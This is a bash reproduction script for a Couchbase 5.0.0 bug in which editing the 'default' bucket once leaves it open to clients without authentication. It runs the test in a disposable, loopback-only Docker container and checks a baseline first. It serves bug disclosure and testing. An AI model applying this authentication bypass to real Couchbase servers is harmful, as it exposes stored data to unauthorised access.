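#!/bin/bash
#
# Couchbase 5.0.0 "edit-to-free" Security Bug
# ===========================================
#
# Couchbase 5 introduced RBAC, so clients must always authenticate to
# access any bucket. For the 'default' bucket, however, editing the bucket
# once lets clients access it without authentication.
#
# Heungsub Lee <sub@subl.ee>
#
# Requirements: docker, and a `python` that can import `couchbase.bucket`.
#
# Environment overrides (defaults match the original script):
#   CB_IMAGE         image to test; point it at another release to check
#                    whether that release still shows the behaviour
#   CB_STARTUP_WAIT  seconds to wait for the server before initialising it
#
# Exit status:
#   0      reproduced: the bucket opens without auth after the edit
#   2      baseline invalid: the bucket already opened without auth
#   3      missing prerequisite, or a container named cb5 already exists
#   other  setup failed, or the problem was not reproduced
#
set -euo pipefail

# only 'default' bucket has this problem
readonly CB_BUCKET='default'
readonly CB_CONTAINER='cb5'
readonly CB_IMAGE="${CB_IMAGE:-couchbase:enterprise-5.0.0}"
readonly CB_STARTUP_WAIT="${CB_STARTUP_WAIT:-10}"
readonly CB_CLI='/opt/couchbase/bin/couchbase-cli'
readonly CB_CLUSTER='127.0.0.1:8091'
readonly CB_USER='Administrator'
# Throwaway credential for the disposable test container only.
readonly CB_PASSWORD='PaSsWoRd'

# Run couchbase-cli inside the test container with the given arguments.
cb_cli() {
  docker exec "$CB_CONTAINER" "$CB_CLI" "$@"
}

# Print a section header for one step of the reproduction.
banner() {
  echo
  echo '========================================================================'
  printf ' %s\n' "$1"
  echo '========================================================================'
}

# Try to open the bucket with no credentials; returns python's exit status.
# The bucket name travels through the environment and the heredoc is quoted,
# so no shell value is ever expanded into the Python source.
try_unauthenticated_access() {
  CB_BUCKET="$CB_BUCKET" python <<'EOF'
import os
from couchbase.bucket import Bucket
print(Bucket('couchbase://127.0.0.1/' + os.environ['CB_BUCKET']))
EOF
}

# Best-effort cleanup: the container may not exist if `docker run` failed
# before creating it, so errors here are deliberately ignored.
finalize() {
  docker rm -f "$CB_CONTAINER" >/dev/null 2>&1 || true
}

# Check prerequisites up front. Otherwise a missing SDK makes step 3 fail
# and the run is misread as "not reproduced".
if ! command -v docker >/dev/null; then
  echo 'docker not found in PATH' >&2
  exit 3
fi
if ! python -c 'from couchbase.bucket import Bucket'; then
  echo 'python cannot import couchbase.bucket' >&2
  exit 3
fi

# Refuse to run if the name is taken: the EXIT trap below force-removes the
# container, and it must never remove one this script did not create.
if docker container inspect "$CB_CONTAINER" >/dev/null 2>&1; then
  echo "container '$CB_CONTAINER' already exists; remove it first" >&2
  exit 3
fi

# Install the trap before `docker run`: a start failure (e.g. a port
# conflict) can leave a created-but-stopped container behind.
trap finalize EXIT

# create new couchbase 5.0
# Ports are published on loopback only. The instance has a known admin
# password and, after step 2, a bucket that needs no credentials, so it
# must not be reachable from other hosts.
docker run -d --name="$CB_CONTAINER" \
  -p 127.0.0.1:8091-8094:8091-8094 -p 127.0.0.1:11210:11210 \
  "$CB_IMAGE"

# wait for couchbase ready
sleep "$CB_STARTUP_WAIT"

# init new cluster
docker exec "$CB_CONTAINER" mkdir -p /data/data /data/index
docker exec "$CB_CONTAINER" chown couchbase /data/data /data/index

# NOTE(review): the original passes 'password' here, not the cluster
# password set below; presumably it is not checked on an uninitialised
# node - confirm. Kept as-is.
cb_cli node-init \
  --cluster="$CB_CLUSTER" \
  --user="$CB_USER" \
  --password='password' \
  --node-init-data-path='/data/data' \
  --node-init-index-path='/data/index'

cb_cli cluster-init \
  --cluster="$CB_CLUSTER" \
  --cluster-username="$CB_USER" \
  --cluster-password="$CB_PASSWORD" \
  --cluster-port='8091' \
  --cluster-ramsize='512' \
  --cluster-index-ramsize='256' \
  --cluster-fts-ramsize='256' \
  --index-storage-setting='default' \
  --services='data,index,query'

cb_cli setting-cluster \
  --cluster="$CB_CLUSTER" \
  --user="$CB_USER" \
  --password="$CB_PASSWORD" \
  --cluster-name='test'

# create new bucket 'default'
cb_cli bucket-create \
  --cluster="$CB_CLUSTER" \
  --user="$CB_USER" \
  --password="$CB_PASSWORD" \
  --bucket="$CB_BUCKET" \
  --bucket-ramsize='512' \
  --bucket-replica='0' \
  --bucket-type='couchbase' \
  --bucket-priority='high' \
  --bucket-eviction-policy='fullEviction' \
  --enable-flush='1' \
  --enable-index-replica='0' \
  --conflict-resolution='sequence' \
  --wait

# 1. not possible to get bucket without auth
banner '1. not possible to get bucket without auth'
# The attempt is expected to fail. If it succeeds, the baseline is invalid
# and a success in step 3 would prove nothing, so stop with a distinct code.
if try_unauthenticated_access; then
  echo 'baseline invalid: bucket opened without auth before the edit' >&2
  exit 2
fi

# 2. edit bucket
banner '2. edit bucket'
# No settings are changed; the edit call alone is the trigger under test.
cb_cli bucket-edit \
  --cluster="$CB_CLUSTER" \
  --user="$CB_USER" \
  --password="$CB_PASSWORD" \
  --bucket="$CB_BUCKET"

# 3. now we can get bucket without auth
banner '3. now we can get bucket without auth'
# if the problem is not reproduced, here fails with non-zero exit code.
try_unauthenticated_access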